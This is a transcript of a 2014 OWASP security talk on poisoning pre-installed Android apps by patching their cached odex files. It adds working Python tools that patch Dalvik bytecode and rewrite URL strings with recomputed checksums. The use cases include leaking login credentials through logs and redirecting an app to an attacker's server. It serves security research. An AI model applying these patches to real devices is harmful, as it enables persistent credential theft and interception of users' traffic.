Pre-installed Android application poisoning #appsecapac2014

OWASP Japan
March 20, 2014
Transcript

  1. Whoami
    • Yoshitaka Kato, Hewlett-Packard Japan, Senior Security Consultant, Enterprise Security Services
    • In charge of incident response and penetration testing services in the APJ region
    • Smartphone application geek in personal life
    • CTF player
  2. Agenda
    • Overview
    • Prologue
    • Introduction of a new hacking practice: pre-installed application poisoning
  3. Overview
    • A new manipulation technique for built Android applications.
    • New analysis and attack techniques that use it (application poisoning).
  4. Why do we analyze/manipulate built Android applications? (Prologue)
    • For security research
    • To improve usability
    • For attacks (e.g. building a Trojan)
    • Other
  5. The present common manipulation steps (Prologue)
    Obtain the .apk file → extract the .apk → decompile → manipulate → repack into an .apk → sign the .apk → uninstall, then install.
    Tools used in these steps: apktool (smali, baksmali), AXMLparser, ddx, dex2jar, jad, jd, keytool/jarsigner.
  6. Why are so many steps needed? (Prologue)
    The .apk structure is a bit complicated:
    • compressed (a zip archive)
    • signed
    • encoded (binary manifest and resources)
    • the code is an executable binary (.dex) that must be disassembled into smali before it can be edited
  7. What is a dex file? (Prologue)
    .dex file: compiled Android application code file.
    "Android programs are compiled into .dex (Dalvik Executable) files, which are in turn zipped into a single .apk file on the device. .dex files can be created by automatically translating compiled applications written in the Java programming language."
    http://developer.android.com/guide/appendix/glossary.html
    http://www.scriptol.com/programming/dalvik.php
  8. Problems with the present common manipulation technique (Prologue)
    • Troublesome: so many steps, so many tools.
    • Reassembling smali back into a .dex (the smali/baksmali toolchain) often fails.
    • Pre-installed applications cannot be uninstalled, so they cannot be replaced with a manipulated version.
    • Re-signing replaces the original signature.
  9. Security model by signature (Prologue)
    • Security settings are defined in AndroidManifest.xml.
    • The signature-based model can restrict access (cooperation) between applications: signature-level permissions and a shared user ID are granted only to applications signed with the same key.
    • If the signature changes, an application may therefore lose access to another application, and that functionality stops working.
  11. Overview (Practice)
    • A new approach; at least I have never seen it on the web.
    • Root is required!! But that is no problem for hackers, is it?
    • The technique manipulates the cached executable binary (.odex) on the Android device directly.
  12. Odex? (Practice)
    "In short, an odex file is an optimized version of a classes.dex file that has optimizations that are device specific."
    http://code.google.com/p/smali/wiki/DeodexInstructions
    (Diagram: dex → install → odex.)
  13. Where is the odex? (Practice)
    • /system/app/ or /data/dalvik-cache/
    • System applications, including pre-installed ones, can be in either; user applications are in the latter.
    • In this presentation the target is the latter.
  14. .dex file format (Practice)
    http://source.android.com/devices/tech/dalvik/dex-format.html
    The odex format is a bit different from the dex format, and it seems not to be documented (does anybody know?).
  15. odex manipulation technique (Practice)
    • Tool used: dexdump only!!
    • dexdump is included in the Android SDK.
    • It is like objdump.
  16. Manipulation steps (Practice)
    1. Obtain the odex file.
    2. Manipulate it using dexdump:
       2-1. Identify the place to manipulate.
       2-2. Manipulate it (binary patching; dexdump only disassembles, the patch itself is a byte edit at the offset it reports).
       2-3. Recalculate the checksum (optional).
    3. Copy it over the file on the Android device (overwrite, not install).
    4. Reboot.
  17. Checksum (Practice)
    • The dex/odex file carries a checksum in its header (purpose unknown; Adler-32).
    • dexdump can compute the checksum after manipulation, so overwriting the header value with what it reports should be enough.
  18. Demonstration (Practice)
    • An application that shows a popup dialog and then exits immediately.
    • Manipulate it so that the popup is not shown (and it does not exit).
  19. Manipulation steps (again) (Practice)
    The same four steps as on slide 16: obtain the odex file; manipulate it using dexdump (identify the place, binary-patch it, optionally recalculate the checksum); copy it over the file on the Android device (overwrite, not install); reboot.
  20. Advantages (Practice)
    • Easier!!
    • The signature is not changed.
    • Easy rollback: delete the odex file in dalvik-cache and it is regenerated.
  21. A name for this technique: installed application poisoning (Practice)
  22. Practical use case 1 (Use case)
    • For dynamic analysis of an application, log output is effective.
    • A debug logging class is left behind in many released applications.
    • So abuse it.
  23. A common Log class (Use case)
    (Code figure.) Log output is controlled by a debug flag; there are three log output functions.
  24. Flag manipulation (Use case)
    (dexdump of the Log class.) Callout: the constant that initialises the debug flag; we want to change it to 1.
  25. Practical use case 2 (Use case)
    The common Log class again: the error log is output regardless of the debug flag.
  26. Function pointer manipulation (Use case)
    (dexdump of the class that calls the log functions.) Callout: the method reference is a function pointer; it can be changed to an arbitrary function.
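The flag manipulation on slide 24 changes the constant that initialises the debug flag, and the function pointer manipulation above changes which method an invoke instruction calls; both are single-operand edits inside a Dalvik 16-bit code unit. The following example is added here for this page (it is not the talk's material): it decodes the few instruction formats involved into dexdump-style text and applies those two patches to constructed sample bytecode (a class initialiser that stores 0 into a static boolean flag, and a call to a two-argument static logging method). Unit offsets match the right-hand column of `dexdump -d`. Two caveats a practitioner should keep in mind: in an odex, dexopt may already have rewritten invoke-virtual into invoke-virtual-quick, whose operand is a vtable slot rather than a method_ids index, and a redirected call keeps the same argument registers, so the new target should have the same prototype.

```python
"""Added example (written for this page, not the talk's own material): decode and
patch the Dalvik instructions that the flag-manipulation and function-pointer slides
edit by hand. Dalvik code is a stream of little-endian 16-bit units; only the opcodes
and formats needed here are tabled. The sample bytecode below is constructed."""
import struct

# opcode -> (mnemonic, instruction format). invoke-virtual-quick is what dexopt
# emits in an odex instead of invoke-virtual; its BBBB operand is a vtable index.
OPCODES = {
    0x0c: ("move-result-object", "11x"),
    0x0e: ("return-void", "10x"),
    0x12: ("const/4", "11n"),
    0x1a: ("const-string", "21c"),
    0x28: ("goto", "10t"),
    0x6a: ("sput-boolean", "21c"),
    0x6e: ("invoke-virtual", "35c"),
    0x6f: ("invoke-super", "35c"),
    0x70: ("invoke-direct", "35c"),
    0x71: ("invoke-static", "35c"),
    0x72: ("invoke-interface", "35c"),
    0xf8: ("invoke-virtual-quick", "35ms"),
}
UNITS = {"10x": 1, "11n": 1, "11x": 1, "10t": 1, "21c": 2, "35c": 3, "35ms": 3}


def _units(insns):
    return list(struct.unpack("<%dH" % (len(insns) // 2), insns))


def _pack(units):
    return struct.pack("<%dH" % len(units), *units)


def decode(insns):
    """[(unit offset, opcode, text)] in the style of dexdump -d's right-hand column."""
    units, pos, out = _units(insns), 0, []
    while pos < len(units):
        u0 = units[pos]
        op = u0 & 0xFF
        if op not in OPCODES:
            raise ValueError("unsupported opcode 0x%02x at unit %04x" % (op, pos))
        name, fmt = OPCODES[op]
        if fmt == "10x":
            text = name
        elif fmt == "11n":                       # B|A|op: vA, 4-bit signed literal B
            a, b = (u0 >> 8) & 0xF, u0 >> 12
            text = "%s v%d, #int %d" % (name, a, b - 16 if b & 8 else b)
        elif fmt == "11x":                       # AA|op
            text = "%s v%d" % (name, u0 >> 8)
        elif fmt == "10t":                       # AA|op, signed branch offset in units
            aa = u0 >> 8
            text = "%s %+d" % (name, aa - 256 if aa & 0x80 else aa)
        elif fmt == "21c":                       # AA|op BBBB
            kind = "string" if op == 0x1a else "field"
            text = "%s v%d, %s@%04x" % (name, u0 >> 8, kind, units[pos + 1])
        else:                                    # 35c / 35ms: A|G|op BBBB F|E|D|C
            a, g, u2 = u0 >> 12, (u0 >> 8) & 0xF, units[pos + 2]
            regs = [u2 & 0xF, (u2 >> 4) & 0xF, (u2 >> 8) & 0xF, u2 >> 12, g][:a]
            kind = "vtable" if fmt == "35ms" else "method"
            text = "%s {%s}, %s@%04x" % (name, ", ".join("v%d" % r for r in regs), kind, units[pos + 1])
        out.append((pos, op, text))
        pos += UNITS[fmt]
    return out


def disasm(insns):
    return ["%04x: %s" % (pos, text) for pos, _, text in decode(insns)]


def find_first(insns, mnemonic):
    """Step 2-1: locate the instruction to patch; returns its unit offset or None."""
    for pos, op, _ in decode(insns):
        if OPCODES[op][0] == mnemonic:
            return pos
    return None


def set_const4(insns, unit_off, value):
    """Flag manipulation: rewrite the literal of a const/4 (4-bit signed, -8..7)."""
    units = _units(insns)
    if units[unit_off] & 0xFF != 0x12:
        raise ValueError("no const/4 at unit %04x" % unit_off)
    if not -8 <= value <= 7:
        raise ValueError("const/4 literal out of range")
    a = (units[unit_off] >> 8) & 0xF
    units[unit_off] = ((value & 0xF) << 12) | (a << 8) | 0x12
    return _pack(units)


def set_invoke_target(insns, unit_off, index):
    """Function pointer manipulation: point an invoke-* at another method_ids entry
    (or vtable slot for the *-quick form). The callee receives the same argument
    registers, so choose a target with the same prototype."""
    units = _units(insns)
    op = units[unit_off] & 0xFF
    if OPCODES.get(op, (None, None))[1] not in ("35c", "35ms"):
        raise ValueError("no invoke at unit %04x" % unit_off)
    if not 0 <= index <= 0xFFFF:
        raise ValueError("index does not fit in 16 bits")
    units[unit_off + 1] = index
    return _pack(units)


# Constructed samples: Log.<clinit> storing 0 into a static boolean DEBUG flag
# (const/4 v0, #0; sput-boolean v0, field@0002; return-void), and a caller doing
# invoke-static {v1, v2}, method@0003; return-void.
CLINIT = bytes.fromhex("1200" "6a000200" "0e00")
LOGCALL = bytes.fromhex("712003002100" "0e00")

if __name__ == "__main__":
    for line in disasm(set_const4(CLINIT, find_first(CLINIT, "const/4"), 1)):
        print(line)
```

Changing `12 00` to `12 10` is the whole flag patch; changing the second unit of the invoke (`03 00` to `04 00`) redirects the call, which is the function pointer edit used in use case 2 to route everything through the error-level logger.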
  27. Practical use case 3 (Use case)
    Functionality manipulation: some email application.
  28. dexdump of the try/exception flow, normal case (Use case)
    (Listing.) Callout: return to invoker.
  29. dexdump of the try/exception flow, exception case (Use case)
    (Listing.) Callouts: exception occurred; exception occurred; return to invoker.
  30. Then I thought... (Use case)
    • Can we output data (in this case the ID and password) using the Log function in the exception handler?
      - If the exception-handling code were also run in the normal case,
      - and the data were passed as the arguments of the Log function...
    • Can we do this?
  31. dexdump of the try/exception flow, manipulation 1 (Use case)
    (Listing.) Callout: return to invoker.
  32. Pre-installed application poisoning concept (Use case for attack)
    • Strings manipulation technique.
    • Many applications contain URL strings that are used for web APIs.
    • Rewrite the URL string so that the application connects to a different server; this makes a MITM (man in the middle) attack possible.
  33. Pre-installed application poisoning overview (Use case for attack)
    (Diagram.) Normal: the facebook application connects to https://www.facebook.com/. Poisoned: the facebook application connects to the poisoned URL, i.e. the attacker's server.
  34. Notice: strings manipulation (Use case for attack)
    • Strings are held in the dex/odex as a sorted table; if the sort order is broken, an error results.
    • Also, code refers to a string by its index in that table, so re-sorting after a rewrite would require changing every reference; not a realistic approach.
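Slide 17's checksum and the two constraints above both follow from the dex layout: the header stores an Adler-32 over everything after the checksum field (and a SHA-1 signature over everything after that), string_ids is an array of offsets that must stay sorted by UTF-16 code unit, and bytecode names a string only by its index in that array. An in-place edit therefore has to keep the byte length and the order, and then refresh the header. The example below is added for this page; it is not the author's "Strings poisoner". It builds a constructed dex holding only a string table, patches one URL in place with those checks, recomputes the header hashes, and does the same through the odex wrapper, whose layout is the DexOptHeader struct from Dalvik's libdex (its own checksum field covers only the deps/opt sections, not the embedded dex). Dalvik verifies the dex checksum on load only when started with the -Xcheckdexsum option, which is why the slide can mark recalculation as optional; a patched file should still carry a correct value so that dexdump and any later dexopt run accept it.

```python
"""Added example (written for this page; not the author's "Strings poisoner"): patch a
URL string in place inside a dex or odex image, refusing edits that would break the
string_ids ordering or length, then recompute the header's Adler-32 checksum and SHA-1
signature. Field offsets follow the dex-format reference; the odex wrapper follows the
DexOptHeader struct in Dalvik's libdex. Sample images are constructed (ASCII only)."""
import hashlib
import struct
import zlib

DEX_MAGIC, ODEX_MAGIC = b"dex\n035\0", b"dey\n036\0"
HEADER_SIZE = 0x70   # fixed dex header size
STRING_IDS = 56      # header offset of string_ids_size, string_ids_off


def uleb128(n):
    out = bytearray()
    while True:
        byte, n = n & 0x7F, n >> 7
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)


def read_uleb128(buf, off):
    value = shift = 0
    while True:
        byte = buf[off]
        off += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, off
        shift += 7


def fix_header_hashes(dex):
    """signature = SHA-1 of bytes 32..end; checksum = Adler-32 of bytes 12..end
    (everything except the magic and the checksum field itself)."""
    dex[12:32] = hashlib.sha1(dex[32:]).digest()
    struct.pack_into("<I", dex, 8, zlib.adler32(bytes(dex[12:])) & 0xFFFFFFFF)


def dex_region(image):
    """(offset, length) of the dex embedded in an odex, or of a bare dex."""
    if image[:8] == ODEX_MAGIC:
        return struct.unpack_from("<II", image, 8)          # dexOffset, dexLength
    if image[:8] == DEX_MAGIC:
        return 0, struct.unpack_from("<I", image, 32)[0]    # file_size
    raise ValueError("not a dex/odex image")


def checksum_ok(image):
    start, length = dex_region(image)
    dex = bytes(image[start:start + length])
    return struct.unpack_from("<I", dex, 8)[0] == zlib.adler32(dex[12:]) & 0xFFFFFFFF


def build_sample_dex(strings):
    """Constructed sample: a dex holding only a sorted string_ids table and its string_data."""
    if strings != sorted(strings):
        raise ValueError("string_ids must be sorted by UTF-16 code unit")
    ids_off, data_off = HEADER_SIZE, HEADER_SIZE + 4 * len(strings)
    data, offsets = bytearray(), []
    for s in strings:
        raw = s.encode("ascii")
        offsets.append(data_off + len(data))
        data += uleb128(len(raw)) + raw + b"\0"             # string_data_item
    dex = bytearray(HEADER_SIZE) + b"".join(struct.pack("<I", o) for o in offsets) + data
    dex[0:8] = DEX_MAGIC
    struct.pack_into("<III", dex, 32, len(dex), HEADER_SIZE, 0x12345678)  # file_size, header_size, endian_tag
    struct.pack_into("<II", dex, STRING_IDS, len(strings), ids_off)
    struct.pack_into("<II", dex, 104, len(data), data_off)  # data_size, data_off
    fix_header_hashes(dex)
    return bytes(dex)


def wrap_as_odex(dex):
    """Constructed odex: 40-byte DexOptHeader (empty deps/opt; its checksum covers only those)."""
    end = 40 + len(dex)
    return ODEX_MAGIC + struct.pack("<8I", 40, len(dex), end, 0, end, 0, 0, zlib.adler32(b"")) + dex


def read_strings(dex):
    """[(string_data offset, text)] in string_ids order (ASCII: utf16_size == byte length)."""
    count, ids_off = struct.unpack_from("<II", dex, STRING_IDS)
    out = []
    for i in range(count):
        off = struct.unpack_from("<I", dex, ids_off + 4 * i)[0]
        size, pos = read_uleb128(dex, off)
        out.append((off, bytes(dex[pos:pos + size]).decode("ascii")))
    return out


def poison_string(image, old, new):
    """Overwrite `old` with `new` in place; keeps string_ids sorted and the checksum valid."""
    img = bytearray(image)
    start, length = dex_region(img)
    dex = img[start:start + length]
    entries = read_strings(dex)
    texts = [t for _, t in entries]
    idx = texts.index(old)                                  # ValueError if absent
    if len(new.encode("ascii")) != len(old.encode("ascii")):
        raise ValueError("replacement must keep the byte length (no room to grow; shorter needs the uleb128 size rewritten)")
    texts[idx] = new
    if texts != sorted(texts):
        raise ValueError("replacement would break the sorted order of string_ids")
    _, pos = read_uleb128(dex, entries[idx][0])
    dex[pos:pos + len(new)] = new.encode("ascii")
    fix_header_hashes(dex)
    img[start:start + length] = dex
    return bytes(img)
```

The facebook to facebooj rewrite from the demonstration passes both checks (same length, still sorted between "Lcom/..." and "https://www.google.com/"), whereas a same-length name that sorts after its neighbour, or a shorter host, is refused rather than written into the file.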
  35. Demonstration (Use case for attack)
    • I made an application for the manipulation, named "Strings poisoner".
    • No PC is needed for the poisoning.
    • It is modelled on the behaviour of a malicious (virus) application.
  36. Demonstration steps (Use case for attack)
    (Diagram, steps 1 to 5.) Normal: the facebook application connects to https://www.facebook.com/. Strings Poisoner rewrites "facebook" to "facebooj"; the poisoned facebook application then connects to https://www.facebooj.com/, the attacker's server (facebooj.com).
  37. Pre-installed application poisoning: key points (Use case for attack)
    • The attack continues even if the malicious application is uninstalled.
    • The attack continues even if the Android device is unrooted.
    • The pre-installed application cannot be fixed by reinstalling it, because it is not uninstallable; only removing the poisoned odex from dalvik-cache (which lives under /data and is therefore wiped by a factory reset) restores the original behaviour.
  38. Pre-installed application poisoning use case summary (Use case for attack)
    • Flag manipulation
    • Function pointer manipulation
    • Functionality manipulation
    • Strings manipulation
    • String pointer manipulation is also possible.
  39. Pre-installed Android application poisoning (Conclusion)
    Pros:
    – An easier technique than before.
    – Depending on how it is used, a hacker's technique for analysis (white hat) or for attack (black hat).
    Cons:
    – Not suitable for large manipulations.
    – The odex is device specific, so the patch location and method differ for each odex file.